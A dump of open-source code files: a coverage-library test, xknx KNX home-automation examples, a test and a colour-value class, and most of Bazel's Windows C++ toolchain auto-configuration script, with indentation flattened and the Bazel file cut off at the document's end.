assert coverage.coverage_db["top.t8.check"].coverage == 0 #should be fixed 0 now forever
sample(4)
sample(3)
sample(1)
assert coverage.coverage_db["top.t8.check"].coverage == 0
sample(-1)
assert coverage.coverage_db["top.t8.check"].coverage == 0
def test_print_coverage():
print("Running test_print_coverage")
@coverage.CoverPoint("top.t9.c1", bins=[1,2,3])
def sample(i):
pass
print_ = []
def logger(_):
print_.append(_)
coverage.coverage_db.report_coverage(logger, bins=True, node="top.t9")
#check if only t9 printed
#print(print_)
assert print_[0].strip().startswith("top.t9")
def test_bins_labels():
print("Running test_bins_labels")
@coverage.CoverPoint("top.t10.c1", xf = lambda i,j : (i , i), bins_labels = ["a", "b"], bins=[(1,1), (2,2)])
@coverage.CoverPoint("top.t10.c2", vname="j", bins_labels = ["c", "d"], bins=[3,4])
@coverage.CoverCross("top.t10.cross", items=["top.t10.c1", "top.t10.c2"])
def sample(i,j):
pass
assert coverage.coverage_db["top.t10.cross"].size == 4
sample(1,1)
assert coverage.coverage_db["top.t10.cross"].coverage == 0
sample(1,3)
assert coverage.coverage_db["top.t10.cross"].coverage == 1
sample(1,4)
assert coverage.coverage_db["top.t10.cross"].coverage == 2
sample(2,4)
assert coverage.coverage_db["top.t10.cross"].coverage == 3
sample(2,3)
assert coverage.coverage_db["top.t10.cross"].coverage == 4
``` |
{
"source": "jonppe/xknx",
"score": 3
} |
#### File: xknx/examples/example_config.py
```python
import asyncio
from xknx import XKNX
async def main():
"""Read xknx.yaml, walk through all devices and print them."""
xknx = XKNX(config="xknx.yaml")
for device in xknx.devices:
print(device)
asyncio.run(main())
```
#### File: xknx/examples/example_daemon.py
```python
import asyncio
from xknx import XKNX
from xknx.devices import Switch
async def device_updated_cb(device):
"""Do something with the updated device."""
print(f"Callback received from {device.name}")
async def main():
"""Connect to KNX/IP device and listen if a switch was updated via KNX bus."""
xknx = XKNX(device_updated_cb=device_updated_cb, daemon_mode=True)
Switch(xknx, name="TestOutlet", group_address="1/1/11")
# Wait until Ctrl-C was pressed
await xknx.start()
await xknx.stop()
asyncio.run(main())
```
#### File: test/remote_value_tests/remote_value_switch_test.py
```python
import asyncio
import unittest
from xknx import XKNX
from xknx.dpt import DPTArray, DPTBinary
from xknx.exceptions import ConversionError, CouldNotParseTelegram
from xknx.remote_value import RemoteValueSwitch
from xknx.telegram import GroupAddress, Telegram
class TestRemoteValueSwitch(unittest.TestCase):
"""Test class for RemoteValueSwitch objects."""
def setUp(self):
"""Set up test class."""
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
def tearDown(self):
"""Tear down test class."""
self.loop.close()
def test_to_knx(self):
"""Test to_knx function with normal operation."""
xknx = XKNX()
remote_value = RemoteValueSwitch(xknx)
self.assertEqual(remote_value.to_knx(True), DPTBinary(True))
self.assertEqual(remote_value.to_knx(False), DPTBinary(False))
def test_from_knx(self):
"""Test from_knx function with normal operation."""
xknx = XKNX()
remote_value = RemoteValueSwitch(xknx)
self.assertEqual(remote_value.from_knx(DPTBinary(True)), True)
self.assertEqual(remote_value.from_knx(DPTBinary(0)), False)
def test_to_knx_invert(self):
"""Test to_knx function with normal operation."""
xknx = XKNX()
remote_value = RemoteValueSwitch(xknx, invert=True)
self.assertEqual(remote_value.to_knx(True), DPTBinary(0))
self.assertEqual(remote_value.to_knx(False), DPTBinary(1))
def test_from_knx_invert(self):
"""Test from_knx function with normal operation."""
xknx = XKNX()
remote_value = RemoteValueSwitch(xknx, invert=True)
self.assertEqual(remote_value.from_knx(DPTBinary(1)), False)
self.assertEqual(remote_value.from_knx(DPTBinary(0)), True)
def test_to_knx_error(self):
"""Test to_knx function with wrong parametern."""
xknx = XKNX()
remote_value = RemoteValueSwitch(xknx)
with self.assertRaises(ConversionError):
remote_value.to_knx(1)
def test_set(self):
"""Test setting value."""
xknx = XKNX()
remote_value = RemoteValueSwitch(xknx, group_address=GroupAddress("1/2/3"))
self.loop.run_until_complete(remote_value.on())
self.assertEqual(xknx.telegrams.qsize(), 1)
telegram = xknx.telegrams.get_nowait()
self.assertEqual(
telegram, Telegram(GroupAddress("1/2/3"), payload=DPTBinary(1))
)
self.loop.run_until_complete(remote_value.off())
self.assertEqual(xknx.telegrams.qsize(), 1)
telegram = xknx.telegrams.get_nowait()
self.assertEqual(
telegram, Telegram(GroupAddress("1/2/3"), payload=DPTBinary(0))
)
def test_process(self):
"""Test process telegram."""
xknx = XKNX()
remote_value = RemoteValueSwitch(xknx, group_address=GroupAddress("1/2/3"))
telegram = Telegram(group_address=GroupAddress("1/2/3"), payload=DPTBinary(1))
self.assertEqual(remote_value.value, None)
self.loop.run_until_complete(remote_value.process(telegram))
self.assertIsNotNone(remote_value.payload)
self.assertEqual(remote_value.value, True)
def test_process_off(self):
"""Test process OFF telegram."""
xknx = XKNX()
remote_value = RemoteValueSwitch(xknx, group_address=GroupAddress("1/2/3"))
telegram = Telegram(group_address=GroupAddress("1/2/3"), payload=DPTBinary(0))
self.assertEqual(remote_value.value, None)
self.loop.run_until_complete(remote_value.process(telegram))
self.assertIsNotNone(remote_value.payload)
self.assertEqual(remote_value.value, False)
def test_to_process_error(self):
"""Test process errornous telegram."""
xknx = XKNX()
remote_value = RemoteValueSwitch(xknx, group_address=GroupAddress("1/2/3"))
with self.assertRaises(CouldNotParseTelegram):
telegram = Telegram(
group_address=GroupAddress("1/2/3"), payload=DPTArray(0x01)
)
self.loop.run_until_complete(remote_value.process(telegram))
with self.assertRaises(CouldNotParseTelegram):
telegram = Telegram(
group_address=GroupAddress("1/2/3"), payload=DPTBinary(3)
)
self.loop.run_until_complete(remote_value.process(telegram))
# pylint: disable=pointless-statement
remote_value.value
```
#### File: xknx/remote_value/remote_value_color_rgbw.py
```python
from xknx.dpt import DPTArray
from xknx.exceptions import ConversionError
from .remote_value import RemoteValue
class RemoteValueColorRGBW(RemoteValue):
"""Abstraction for remote value of KNX DPT 251.600 (DPT_Color_RGBW)."""
def __init__(
self,
xknx,
group_address=None,
group_address_state=None,
device_name=None,
feature_name="Color RGBW",
after_update_cb=None,
):
"""Initialize remote value of KNX DPT 251.600 (DPT_Color_RGBW)."""
# pylint: disable=too-many-arguments
super().__init__(
xknx,
group_address,
group_address_state,
device_name=device_name,
feature_name=feature_name,
after_update_cb=after_update_cb,
)
self.previous_value = (0, 0, 0, 0)
def payload_valid(self, payload):
"""Test if telegram payload may be parsed."""
return isinstance(payload, DPTArray) and len(payload.value) == 6
def to_knx(self, value):
"""
Convert value (4-6 bytes) to payload (6 bytes).
* Structure of DPT 251.600
** Byte 0: R value
** Byte 1: G value
** Byte 2: B value
** Byte 3: W value
** Byte 4: 0x00 (reserved)
** Byte 5:
*** Bit 0: W value valid?
*** Bit 1: B value valid?
*** Bit 2: G value valid?
*** Bit 3: R value valid?
*** Bit 4-7: 0
In case we receive
* > 6 bytes: error
* 6 bytes: all bytes are passed through
* 5 bytes: 0x00?? fill up to 6 bytes
* 4 bytes: 0x000f right padding to 6 bytes
* < 4 bytes: error
"""
if not isinstance(value, (list, tuple)):
raise ConversionError(
"Could not serialize RemoteValueColorRGBW (wrong type, expecting list of 4-6 bytes))",
value=value,
type=type(value),
)
if len(value) < 4 or len(value) > 6:
raise ConversionError(
"Could not serialize value to DPT 251.600 (wrong length, expecting list of 4-6 bytes)",
value=value,
type=type(value),
)
rgbw = value[:4]
if (
any(not isinstance(color, int) for color in rgbw)
or any(color < 0 for color in rgbw)
or any(color > 255 for color in rgbw)
):
raise ConversionError(
"Could not serialize DPT 251.600 (wrong RGBW values)", value=value
)
if len(value) < 5:
return DPTArray(list(rgbw) + [0x00, 0x0F])
if len(value) < 6:
return DPTArray(list(rgbw) + [0x00] + list(value[4:]))
return DPTArray(value)
def from_knx(self, payload):
"""
Convert current payload to value. Always 4 byte (RGBW).
If one element is invalid, use the previous value. All previous element
values are initialized to 0.
"""
result = []
for i in range(0, len(payload.value) - 2):
valid = (payload.value[5] & (0x08 >> i)) != 0 # R,G,B,W value valid?
result.append(payload.value[i] if valid else self.previous_value[i])
self.previous_value = result
return result
``` |
{
"source": "jonpspri/bazel",
"score": 2
} |
#### File: tools/cpp/windows_cc_configure.bzl
```python
load(
"@bazel_tools//tools/cpp:lib_cc_configure.bzl",
"auto_configure_fail",
"auto_configure_warning",
"auto_configure_warning_maybe",
"escape_string",
"execute",
"resolve_labels",
"write_builtin_include_directory_paths",
)
def _get_path_env_var(repository_ctx, name):
"""Returns a path from an environment variable.
Removes quotes, replaces '/' with '\', and strips trailing '\'s."""
if name in repository_ctx.os.environ:
value = repository_ctx.os.environ[name]
if value[0] == "\"":
if len(value) == 1 or value[-1] != "\"":
auto_configure_fail("'%s' environment variable has no trailing quote" % name)
value = value[1:-1]
if "/" in value:
value = value.replace("/", "\\")
if value[-1] == "\\":
value = value.rstrip("\\")
return value
else:
return None
def _get_temp_env(repository_ctx):
"""Returns the value of TMP, or TEMP, or if both undefined then C:\\Windows."""
tmp = _get_path_env_var(repository_ctx, "TMP")
if not tmp:
tmp = _get_path_env_var(repository_ctx, "TEMP")
if not tmp:
tmp = "C:\\Windows\\Temp"
auto_configure_warning(
"neither 'TMP' nor 'TEMP' environment variables are set, using '%s' as default" % tmp,
)
return tmp
def _get_escaped_windows_msys_starlark_content(repository_ctx, use_mingw = False):
"""Return the content of msys cc toolchain rule."""
msys_root = ""
bazel_sh = _get_path_env_var(repository_ctx, "BAZEL_SH")
if bazel_sh:
bazel_sh = bazel_sh.replace("\\", "/").lower()
tokens = bazel_sh.rsplit("/", 1)
if tokens[0].endswith("/usr/bin"):
msys_root = tokens[0][:len(tokens[0]) - len("usr/bin")]
elif tokens[0].endswith("/bin"):
msys_root = tokens[0][:len(tokens[0]) - len("bin")]
prefix = "mingw64" if use_mingw else "usr"
tool_path_prefix = escape_string(msys_root) + prefix
tool_bin_path = tool_path_prefix + "/bin"
tool_path = {}
for tool in ["ar", "compat-ld", "cpp", "dwp", "gcc", "gcov", "ld", "nm", "objcopy", "objdump", "strip"]:
if msys_root:
tool_path[tool] = tool_bin_path + "/" + tool
else:
tool_path[tool] = "msys_gcc_installation_error.bat"
tool_paths = ",\n ".join(['"%s": "%s"' % (k, v) for k, v in tool_path.items()])
include_directories = (' "%s/",\n ' % tool_path_prefix) if msys_root else ""
return tool_paths, tool_bin_path, include_directories
def _get_system_root(repository_ctx):
"""Get System root path on Windows, default is C:\\Windows. Doesn't %-escape the result."""
systemroot = _get_path_env_var(repository_ctx, "SYSTEMROOT")
if not systemroot:
systemroot = "C:\\Windows"
auto_configure_warning_maybe(
repository_ctx,
"SYSTEMROOT is not set, using default SYSTEMROOT=C:\\Windows",
)
return escape_string(systemroot)
def _add_system_root(repository_ctx, env):
"""Running VCVARSALL.BAT and VCVARSQUERYREGISTRY.BAT need %SYSTEMROOT%\\\\system32 in PATH."""
if "PATH" not in env:
env["PATH"] = ""
env["PATH"] = env["PATH"] + ";" + _get_system_root(repository_ctx) + "\\system32"
return env
def find_vc_path(repository_ctx):
"""Find Visual C++ build tools install path. Doesn't %-escape the result."""
# 1. Check if BAZEL_VC or BAZEL_VS is already set by user.
bazel_vc = _get_path_env_var(repository_ctx, "BAZEL_VC")
if bazel_vc:
if repository_ctx.path(bazel_vc).exists:
return bazel_vc
else:
auto_configure_warning_maybe(
repository_ctx,
"%BAZEL_VC% is set to non-existent path, ignoring.",
)
bazel_vs = _get_path_env_var(repository_ctx, "BAZEL_VS")
if bazel_vs:
if repository_ctx.path(bazel_vs).exists:
bazel_vc = bazel_vs + "\\VC"
if repository_ctx.path(bazel_vc).exists:
return bazel_vc
else:
auto_configure_warning_maybe(
repository_ctx,
"No 'VC' directory found under %BAZEL_VS%, ignoring.",
)
else:
auto_configure_warning_maybe(
repository_ctx,
"%BAZEL_VS% is set to non-existent path, ignoring.",
)
auto_configure_warning_maybe(
repository_ctx,
"Neither %BAZEL_VC% nor %BAZEL_VS% are set, start looking for the latest Visual C++" +
" installed.",
)
# 2. Check if VS%VS_VERSION%COMNTOOLS is set, if true then try to find and use
# vcvarsqueryregistry.bat / VsDevCmd.bat to detect VC++.
auto_configure_warning_maybe(repository_ctx, "Looking for VS%VERSION%COMNTOOLS environment variables, " +
"eg. VS140COMNTOOLS")
for vscommontools_env, script in [
("VS160COMNTOOLS", "VsDevCmd.bat"),
("VS150COMNTOOLS", "VsDevCmd.bat"),
("VS140COMNTOOLS", "vcvarsqueryregistry.bat"),
("VS120COMNTOOLS", "vcvarsqueryregistry.bat"),
("VS110COMNTOOLS", "vcvarsqueryregistry.bat"),
("VS100COMNTOOLS", "vcvarsqueryregistry.bat"),
("VS90COMNTOOLS", "vcvarsqueryregistry.bat"),
]:
if vscommontools_env not in repository_ctx.os.environ:
continue
script = _get_path_env_var(repository_ctx, vscommontools_env) + "\\" + script
if not repository_ctx.path(script).exists:
continue
repository_ctx.file(
"get_vc_dir.bat",
"@echo off\n" +
"call \"" + script + "\" > NUL\n" +
"echo %VCINSTALLDIR%",
True,
)
env = _add_system_root(repository_ctx, repository_ctx.os.environ)
vc_dir = execute(repository_ctx, ["./get_vc_dir.bat"], environment = env)
auto_configure_warning_maybe(repository_ctx, "Visual C++ build tools found at %s" % vc_dir)
return vc_dir
# 3. User might have purged all environment variables. If so, look for Visual C++ in registry.
# Works for Visual Studio 2017 and older. (Does not work for Visual Studio 2019 Preview.)
# TODO(laszlocsomor): check if "16.0" also has this registry key, after VS 2019 is released.
auto_configure_warning_maybe(repository_ctx, "Looking for Visual C++ through registry")
reg_binary = _get_system_root(repository_ctx) + "\\system32\\reg.exe"
vc_dir = None
for key, suffix in (("VC7", ""), ("VS7", "\\VC")):
for version in ["15.0", "14.0", "12.0", "11.0", "10.0", "9.0", "8.0"]:
if vc_dir:
break
result = repository_ctx.execute([reg_binary, "query", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\VisualStudio\\SxS\\" + key, "/v", version])
auto_configure_warning_maybe(repository_ctx, "registry query result for VC %s:\n\nSTDOUT(start)\n%s\nSTDOUT(end)\nSTDERR(start):\n%s\nSTDERR(end)\n" %
(version, result.stdout, result.stderr))
if not result.stderr:
for line in result.stdout.split("\n"):
line = line.strip()
if line.startswith(version) and line.find("REG_SZ") != -1:
vc_dir = line[line.find("REG_SZ") + len("REG_SZ"):].strip() + suffix
if vc_dir:
auto_configure_warning_maybe(repository_ctx, "Visual C++ build tools found at %s" % vc_dir)
return vc_dir
# 4. Check default directories for VC installation
auto_configure_warning_maybe(repository_ctx, "Looking for default Visual C++ installation directory")
program_files_dir = _get_path_env_var(repository_ctx, "PROGRAMFILES(X86)")
if not program_files_dir:
program_files_dir = "C:\\Program Files (x86)"
auto_configure_warning_maybe(
repository_ctx,
"'PROGRAMFILES(X86)' environment variable is not set, using '%s' as default" % program_files_dir,
)
for path in [
"Microsoft Visual Studio\\2019\\Preview\\VC",
"Microsoft Visual Studio\\2019\\BuildTools\\VC",
"Microsoft Visual Studio\\2019\\Community\\VC",
"Microsoft Visual Studio\\2019\\Professional\\VC",
"Microsoft Visual Studio\\2019\\Enterprise\\VC",
"Microsoft Visual Studio\\2017\\BuildTools\\VC",
"Microsoft Visual Studio\\2017\\Community\\VC",
"Microsoft Visual Studio\\2017\\Professional\\VC",
"Microsoft Visual Studio\\2017\\Enterprise\\VC",
"Microsoft Visual Studio 14.0\\VC",
]:
path = program_files_dir + "\\" + path
if repository_ctx.path(path).exists:
vc_dir = path
break
if not vc_dir:
auto_configure_warning_maybe(repository_ctx, "Visual C++ build tools not found.")
return None
auto_configure_warning_maybe(repository_ctx, "Visual C++ build tools found at %s" % vc_dir)
return vc_dir
def _is_vs_2017_or_2019(vc_path):
"""Check if the installed VS version is Visual Studio 2017."""
# In VS 2017 and 2019, the location of VC is like:
# C:\Program Files (x86)\Microsoft Visual Studio\2017\BuildTools\VC\
# In VS 2015 or older version, it is like:
# C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\
return vc_path.find("2017") != -1 or vc_path.find("2019") != -1
def _find_vcvars_bat_script(repository_ctx, vc_path):
"""Find batch script to set up environment variables for VC. Doesn't %-escape the result."""
if _is_vs_2017_or_2019(vc_path):
vcvars_script = vc_path + "\\Auxiliary\\Build\\VCVARSALL.BAT"
else:
vcvars_script = vc_path + "\\VCVARSALL.BAT"
if not repository_ctx.path(vcvars_script).exists:
return None
return vcvars_script
def _is_support_vcvars_ver(vc_full_version):
"""-vcvars_ver option is supported from version 14.11.25503 (VS 2017 version 15.3)."""
version = [int(i) for i in vc_full_version.split(".")]
min_version = [14, 11, 25503]
return version >= min_version
def _is_support_winsdk_selection(repository_ctx, vc_path):
"""Windows SDK selection is supported with VC 2017 / 2019 or with full VS 2015 installation."""
if _is_vs_2017_or_2019(vc_path):
return True
# By checking the source code of VCVARSALL.BAT in VC 2015, we know that
# when devenv.exe or wdexpress.exe exists, VCVARSALL.BAT supports Windows SDK selection.
vc_common_ide = repository_ctx.path(vc_path).dirname.get_child("Common7").get_child("IDE")
for tool in ["devenv.exe", "wdexpress.exe"]:
if vc_common_ide.get_child(tool).exists:
return True
return False
def setup_vc_env_vars(repository_ctx, vc_path, envvars = [], allow_empty = False, escape = True):
"""Get environment variables set by VCVARSALL.BAT script. Doesn't %-escape the result!
Args:
repository_ctx: the repository_ctx object
vc_path: Visual C++ root directory
envvars: list of envvars to retrieve; default is ["PATH", "INCLUDE", "LIB", "WINDOWSSDKDIR"]
allow_empty: allow unset envvars; if False then report errors for those
escape: if True, escape "\" as "\\" and "%" as "%%" in the envvar values
Returns:
dictionary of the envvars
"""
if not envvars:
envvars = ["PATH", "INCLUDE", "LIB", "WINDOWSSDKDIR"]
vcvars_script = _find_vcvars_bat_script(repository_ctx, vc_path)
if not vcvars_script:
auto_configure_fail("Cannot find VCVARSALL.BAT script under %s" % vc_path)
# Getting Windows SDK version set by user.
# Only supports VC 2017 & 2019 and VC 2015 with full VS installation.
winsdk_version = _get_winsdk_full_version(repository_ctx)
if winsdk_version and not _is_support_winsdk_selection(repository_ctx, vc_path):
auto_configure_warning(("BAZEL_WINSDK_FULL_VERSION=%s is ignored, " +
"because standalone Visual C++ Build Tools 2015 doesn't support specifying Windows " +
"SDK version, please install the full VS 2015 or use VC 2017/2019.") % winsdk_version)
winsdk_version = ""
# Get VC version set by user. Only supports VC 2017 & 2019.
vcvars_ver = ""
if _is_vs_2017_or_2019(vc_path):
full_version = _get_vc_full_version(repository_ctx, vc_path)
# Because VCVARSALL.BAT is from the latest VC installed, so we check if the latest
# version supports -vcvars_ver or not.
if _is_support_vcvars_ver(_get_latest_subversion(repository_ctx, vc_path)):
vcvars_ver = "-vcvars_ver=" + full_version
cmd = "\"%s\" amd64 %s %s" % (vcvars_script, winsdk_version, vcvars_ver)
print_envvars = ",".join(["{k}=%{k}%".format(k = k) for k in envvars])
repository_ctx.file(
"get_env.bat",
"@echo off\n" +
("call %s > NUL \n" % cmd) + ("echo %s \n" % print_envvars),
True,
)
env = _add_system_root(repository_ctx, {k: "" for k in envvars})
envs = execute(repository_ctx, ["./get_env.bat"], environment = env).split(",")
env_map = {}
for env in envs:
key, value = env.split("=", 1)
env_map[key] = escape_string(value.replace("\\", "\\\\")) if escape else value
if not allow_empty:
_check_env_vars(env_map, cmd, expected = envvars)
return env_map
def _check_env_vars(env_map, cmd, expected):
for env in expected:
if not env_map.get(env):
auto_configure_fail(
"Setting up VC environment variables failed, %s is not set by the following command:\n %s" % (env, cmd),
)
def _get_latest_subversion(repository_ctx, vc_path):
"""Get the latest subversion of a VS 2017/2019 installation.
For VS 2017 & 2019, there could be multiple versions of VC build tools.
The directories are like:
<vc_path>\\Tools\\MSVC\\14.10.24930\\bin\\HostX64\\x64
<vc_path>\\Tools\\MSVC\\14.16.27023\\bin\\HostX64\\x64
This function should return 14.16.27023 in this case."""
versions = [path.basename for path in repository_ctx.path(vc_path + "\\Tools\\MSVC").readdir()]
if len(versions) < 1:
auto_configure_warning_maybe(repository_ctx, "Cannot find any VC installation under BAZEL_VC(%s)" % vc_path)
return None
# Parse the version string into integers, then sort the integers to prevent textual sorting.
version_list = []
for version in versions:
parts = [int(i) for i in version.split(".")]
version_list.append((parts, version))
version_list = sorted(version_list)
latest_version = version_list[-1][1]
auto_configure_warning_maybe(repository_ctx, "Found the following VC verisons:\n%s\n\nChoosing the latest version = %s" % ("\n".join(versions), latest_version))
return latest_version
def _get_vc_full_version(repository_ctx, vc_path):
"""Return the value of BAZEL_VC_FULL_VERSION if defined, otherwise the latest version."""
if "BAZEL_VC_FULL_VERSION" in repository_ctx.os.environ:
return repository_ctx.os.environ["BAZEL_VC_FULL_VERSION"]
return _get_latest_subversion(repository_ctx, vc_path)
def _get_winsdk_full_version(repository_ctx):
"""Return the value of BAZEL_WINSDK_FULL_VERSION if defined, otherwise an empty string."""
return repository_ctx.os.environ.get("BAZEL_WINSDK_FULL_VERSION", default = "")
def find_msvc_tool(repository_ctx, vc_path, tool):
"""Find the exact path of a specific build tool in MSVC. Doesn't %-escape the result."""
tool_path = None
if _is_vs_2017_or_2019(vc_path):
full_version = _get_vc_full_version(repository_ctx, vc_path)
if full_version:
tool_path = "%s\\Tools\\MSVC\\%s\\bin\\HostX64\\x64\\%s" % (vc_path, full_version, tool)
else:
# For VS 2015 and older version, the tools are under:
# C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\bin\amd64
tool_path = vc_path + "\\bin\\amd64\\" + tool
if not tool_path or not repository_ctx.path(tool_path).exists:
return None
return tool_path.replace("\\", "/")
def _find_missing_vc_tools(repository_ctx, vc_path):
"""Check if any required tool is missing under given VC path."""
missing_tools = []
if not _find_vcvars_bat_script(repository_ctx, vc_path):
missing_tools.append("VCVARSALL.BAT")
for tool in ["cl.exe", "link.exe", "lib.exe", "ml64.exe"]:
if not find_msvc_tool(repository_ctx, vc_path, tool):
missing_tools.append(tool)
return missing_tools
def _is_support_debug_fastlink(repository_ctx, linker):
"""Run linker alone to see if it supports /DEBUG:FASTLINK."""
if _use_clang_cl(repository_ctx):
# LLVM's lld-link.exe doesn't support /DEBUG:FASTLINK.
return False
result = execute(repository_ctx, [linker], expect_failure = True)
return result.find("/DEBUG[:{FASTLINK|FULL|NONE}]") != -1
def find_llvm_path(repository_ctx):
"""Find LLVM install path."""
# 1. Check if BAZEL_LLVM is already set by user.
bazel_llvm = _get_path_env_var(repository_ctx, "BAZEL_LLVM")
if bazel_llvm:
return bazel_llvm
auto_configure_warning_maybe(repository_ctx, "'BAZEL_LLVM' is not set, " +
"start looking for LLVM installation on machine.")
# 2. Look for LLVM installation through registry.
auto_configure_warning_maybe(repository_ctx, "Looking for LLVM installation through registry")
reg_binary = _get_system_root(repository_ctx) + "\\system32\\reg.exe"
llvm_dir = None
result = repository_ctx.execute([reg_binary, "query", "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\LLVM\\LLVM"])
auto_configure_warning_maybe(repository_ctx, "registry query result for LLVM:\n\nSTDOUT(start)\n%s\nSTDOUT(end)\nSTDERR(start):\n%s\nSTDERR(end)\n" %
(result.stdout, result.stderr))
if not result.stderr:
for line in result.stdout.split("\n"):
line = line.strip()
if line.startswith("(Default)") and line.find("REG_SZ") != -1:
llvm_dir = line[line.find("REG_SZ") + len("REG_SZ"):].strip()
if llvm_dir:
auto_configure_warning_maybe(repository_ctx, "LLVM installation found at %s" % llvm_dir)
return llvm_dir
# 3. Check default directories for LLVM installation
auto_configure_warning_maybe(repository_ctx, "Looking for default LLVM installation directory")
program_files_dir = _get_path_env_var(repository_ctx, "PROGRAMFILES")
if not program_files_dir:
program_files_dir = "C:\\Program Files"
auto_configure_warning_maybe(
repository_ctx,
"'PROGRAMFILES' environment variable is not set, using '%s' as default" % program_files_dir,
)
path = program_files_dir + "\\LLVM"
if repository_ctx.path(path).exists:
llvm_dir = path
if not llvm_dir:
auto_configure_warning_maybe(repository_ctx, "LLVM installation not found.")
return None
auto_configure_warning_maybe(repository_ctx, "LLVM installation found at %s" % llvm_dir)
return llvm_dir
def find_llvm_tool(repository_ctx, llvm_path, tool):
"""Find the exact path of a specific build tool in LLVM. Doesn't %-escape the result."""
tool_path = llvm_path + "\\bin\\" + tool
if not repository_ctx.path(tool_path).exists:
return None
return tool_path.replace("\\", "/")
def _use_clang_cl(repository_ctx):
"""Returns True if USE_CLANG_CL is set to 1."""
return repository_ctx.os.environ.get("USE_CLANG_CL", default = "0") == "1"
def _find_missing_llvm_tools(repository_ctx, llvm_path):
"""Check if any required tool is missing under given LLVM path."""
missing_tools = []
for tool in ["clang-cl.exe", "lld-link.exe", "llvm-lib.exe"]:
if not find_llvm_tool(repository_ctx, llvm_path, tool):
missing_tools.append(tool)
return missing_tools
def _get_clang_version(repository_ctx, clang_cl):
result = repository_ctx.execute([clang_cl, "-v"])
if result.return_code != 0:
auto_configure_fail("Failed to get clang version by running \"%s -v\"" % clang_cl)
# Stderr should look like "clang version X.X.X ..."
return result.stderr.strip().split(" ")[2]
def _get_msys_mingw_vars(repository_ctx):
"""Get the variables we need to populate the msys/mingw toolchains."""
tool_paths, tool_bin_path, inc_dir_msys = _get_escaped_windows_msys_starlark_content(repository_ctx)
tool_paths_mingw, tool_bin_path_mingw, inc_dir_mingw = _get_escaped_windows_msys_starlark_content(repository_ctx, use_mingw = True)
write_builtin_include_directory_paths(repository_ctx, "mingw", [inc_dir_mingw], file_suffix = "_mingw")
msys_mingw_vars = {
"%{cxx_builtin_include_directories}": inc_dir_msys,
"%{mingw_cxx_builtin_include_directories}": inc_dir_mingw,
"%{tool_paths}": tool_paths,
"%{mingw_tool_paths}": tool_paths_mingw,
"%{tool_bin_path}": tool_bin_path,
"%{mingw_tool_bin_path}": tool_bin_path_mingw,
}
return msys_mingw_vars
def _get_msvc_vars(repository_ctx, paths):
"""Get the variables we need to populate the MSVC toolchains."""
msvc_vars = dict()
vc_path = find_vc_path(repository_ctx)
missing_tools = None
if not vc_path:
repository_ctx.template(
"vc_installation_error.bat",
paths["@bazel_tools//tools/cpp:vc_installation_error.bat.tpl"],
{"%{vc_error_message}": ""},
)
else:
missing_tools = _find_missing_vc_tools(repository_ctx, vc_path)
if missing_tools:
message = "\r\n".join([
"echo. 1>&2",
"echo Visual C++ build tools seems to be installed at %s 1>&2" % vc_path,
"echo But Bazel can't find the following tools: 1>&2",
"echo %s 1>&2" % ", ".join(missing_tools),
"echo. 1>&2",
])
repository_ctx.template(
"vc_installation_error.bat",
paths["@bazel_tools//tools/cpp:vc_installation_error.bat.tpl"],
{"%{vc_error_message}": message},
)
if not vc_path or missing_tools:
write_builtin_include_directory_paths(repository_ctx, "msvc", [], file_suffix = "_msvc")
msvc_vars = {
"%{msvc_env_tmp}": "msvc_not_found",
"%{msvc_env_path}": "msvc_not_found",
"%{msvc_env_include}": "msvc_not_found",
"%{msvc_env_lib}": "msvc_not_found",
"%{msvc_cl_path}": "vc_installation_error.bat",
"%{msvc_ml_path}": "vc_installation_error.bat",
"%{msvc_link_path}": "vc_installation_error.bat",
"%{msvc_lib_path}": "vc_installation_error.bat",
"%{dbg_mode_debug_flag}": "/DEBUG",
"%{fastbuild_mode_debug_flag}": "/DEBUG",
"%{msvc_cxx_builtin_include_directories}": "",
}
return msvc_vars
env = setup_vc_env_vars(repository_ctx, vc_path)
escaped_paths = escape_string(env["PATH"])
escaped_include_paths = escape_string(env["INCLUDE"])
escaped_lib_paths = escape_string(env["LIB"])
escaped_tmp_dir = escape_string(_get_temp_env(repository_ctx).replace("\\", "\\\\"))
llvm_path = ""
if _use_clang_cl(repository_ctx):
llvm_path = find_llvm_path(repository_ctx)
if not llvm_path:
auto_configure_fail("\nUSE_CLANG_CL is set to 1, but Bazel cannot find Clang installation on your system.\n" +
"Please install Clang via http://releases.llvm.org/download.html\n")
cl_path = find_llvm_tool(repository_ctx, llvm_path, "clang-cl.exe")
link_path = find_llvm_tool(repository_ctx, llvm_path, "lld-link.exe")
if not link_path:
link_path = find_msvc_tool(repository_ctx, vc_path, "link.exe")
lib_path = find_llvm_tool(repository_ctx, llvm_path, "llvm-lib.exe")
if not lib_path:
lib_path = find_msvc_tool(repository_ctx, vc_path, "lib.exe")
else:
cl_path = find_msvc_tool(repository_ctx, vc_path, "cl.exe")
link_path = find_msvc_tool(repository_ctx, vc_path, "link.exe")
lib_path = find_msvc_tool(repository_ctx, vc_path, "lib.exe")
msvc_ml_path = find_msvc_tool(repository_ctx, vc_path, "ml64.exe")
escaped_cxx_include_directories = []
for path in escaped_include_paths.split(";"):
if path:
escaped_cxx_include_directories.append("\"%s\"" % path)
if llvm_path:
clang_version = _get_clang_version(repository_ctx, cl_path)
clang_dir = llvm_path + "\\lib\\clang\\" + clang_version
clang_include_path = (clang_dir + "\\include").replace("\\", "\\\\")
escaped_cxx_include_directories.append("\"%s\"" % clang_include_path)
clang_lib_path = (clang_dir + "\\lib\\windows").replace("\\", "\\\\")
escaped_lib_paths = escaped_lib_paths + ";" + clang_lib_path
support_debug_fastlink = _is_support_debug_fastlink(repository_ctx, link_path)
write_builtin_include_directory_paths(repository_ctx, "msvc", escaped_cxx_include_directories, file_suffix = "_msvc")
msvc_vars = {
"%{msvc_env_tmp}": escaped_tmp_dir,
"%{msvc_env_path}": escaped_paths,
"%{msvc_env_include}": escaped_include_paths,
"%{msvc_env_lib}": escaped_lib_paths,
"%{msvc_cl_path}": cl_path,
"%{msvc_ml_path}": msvc_ml_path,
"%{msvc_link_path}": link_path,
"%{msvc_lib_path}": lib_path,
"%{dbg_mode_debug_flag}": "/DEBUG:FULL" if support_debug_fastlink else "/DEBUG",
"%{fastbuild_mode_debug_flag}": "/DEBUG:FASTLINK" if support_debug_fastlink else "/DEBUG",
